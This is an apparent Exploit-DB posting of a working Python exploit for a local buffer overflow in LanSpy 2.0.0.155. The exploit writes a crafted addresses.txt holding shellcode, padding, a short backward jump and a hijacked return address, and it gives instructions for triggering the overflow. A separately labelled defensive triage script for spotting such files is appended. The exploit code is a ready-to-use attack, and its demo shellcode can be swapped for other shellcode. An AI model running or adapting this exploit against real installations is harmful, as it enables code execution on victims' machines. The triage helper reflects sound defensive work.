LanSpy 2.0.0.155 – Local Buffer Overflow

  • Author: n30m1nd
  • Date: 2016-10-18
  • Category: Local
  • Platform: Windows
  • Source: https://www.exploit-db.com/exploits/40567/
#!/usr/bin/python

### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###

# Date: 2016-10-18
# Exploit Author: n30m1nd
# Vendor Homepage: www.lantricks.com
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
# Version: LanSpy 2.0.0.155
# Tested on: Win7 32bit and Win10 64bit

# Platforms
# =========
# Tested on Win7 32bit and Win10 64bit
# This exploit should work everywhere since the binary does not implement DEP nor ASLR

# Credits
# =======
# Shouts to hyp3rlinx for the PoC:
#     https://www.exploit-db.com/exploits/38399/
#     http://hyp3rlinx.altervista.org/
# And shouts to the crew at Offensive Security for their huge efforts on making
#     the infosec community better

# How to
# ======
# * Run this python script. It will generate an "addresses.txt" file.
# * Replace this file in the root directory of your LanSpy.exe installation.
# * Run LanSpy.exe and start the scan or do so by pressing F3.
#     - You can also call LanSpy.exe from the command line like the following and
#       it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe

# Exploit code
# ============

import struct

# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20

# MessageBoxA at => 00404D80
msgbox_shellcode = (
    "\x31\xC0\x50\x68"
    "\x70\x77\x6E\x64"
    "\x54\x5F\x50\x57"
    "\x57\x50\x35\xC4"
    "\x80\x80\x55\x35"
    "\x44\xCD\xC0\x55"
    "\x50\xC3"
)

# WinExec at -> 004EC4FF
calc_shellcode = (
    "\x31\xC0\x50\x68"
    "\x63\x61\x6C\x63"
    "\x54\x5F\x50\x57"
    "\x35\xC3\x4E\xC3"
    "\x55\x35\x3C\x8A"
    "\x8D\x55\x50\xC3"
)

# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode

# The shellcode lives in the 126 bytes right before the opcode \x74\x80 (je/jz short -0x80,
# i.e. a jump 128 bytes backwards), so that jump lands exactly at the start of the shellcode
junk = 'A'*(676-126)
if len(scde) > 126:
    exit("[e] Shellcode is too big! Egghunter maybe? ;)")

# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)

# Junk + shellcode + padding + the short jump back (first stage) that lands on the shellcode (second stage),
# with the saved return address overwritten by the jmp ecx address
payl = junk + scde + jecx

# Python 2: str is already a byte string, so it can be written straight to the binary file
with open("addresses.txt", "wb") as f:
    f.write(payl)
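As an added triage example (not part of n30m1nd's exploit): a helper that inspects an addresses.txt file using the layout above (550 junk bytes, a 126-byte shellcode region, the 2-byte short jump, 2 filler bytes, then the 4 bytes that overwrite the saved return address at offset 680) and flags oversized entries, raw non-printable bytes, and whatever value sits where the return address lands. It assumes LanSpy reads one host or address per line and that a legitimate entry is at most 255 printable bytes; neither assumption is stated on the page.

```python
"""Triage helper for a LanSpy addresses.txt (added example, not the exploit's code).

Assumed, not stated on the page: one host/address per line, legitimate entries are
short printable text. Offsets come from the exploit layout: the 4 bytes that land
on the saved return address start at 676 + 2 + 2 = 680.
"""
import string
import struct
import sys

RET_OFFSET = 676 + 2 + 2      # offset of the 4 bytes that land on the saved return address
MAX_SANE_LEN = 255            # assumed upper bound for a legitimate host/IP entry
PRINTABLE = set(string.printable.encode())


def triage_entry(entry):
    """Inspect one line of addresses.txt and return what a responder would want to know."""
    findings = {
        "length": len(entry),
        "oversized": len(entry) > MAX_SANE_LEN,
        "non_printable": sum(1 for b in entry if b not in PRINTABLE),
        "ret_override": None,   # little-endian value sitting at the return-address offset
    }
    if len(entry) >= RET_OFFSET + 4:
        findings["ret_override"] = struct.unpack("<I", entry[RET_OFFSET:RET_OFFSET + 4])[0]
    return findings


def triage_file(data):
    """Triage every non-empty entry; a payload without a newline is a single entry."""
    return [triage_entry(line) for line in data.splitlines() if line]


def suspicious(findings):
    """Oversized, carrying raw bytes, or long enough to reach the return address."""
    return (findings["oversized"] or findings["non_printable"] > 0
            or findings["ret_override"] is not None)


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "addresses.txt"
    with open(path, "rb") as fh:
        for number, result in enumerate(triage_file(fh.read()), 1):
            flag = "SUSPICIOUS" if suspicious(result) else "ok"
            ret = "" if result["ret_override"] is None else " ret=0x%08x" % result["ret_override"]
            print("entry %d: %s len=%d non_printable=%d%s"
                  % (number, flag, result["length"], result["non_printable"], ret))
```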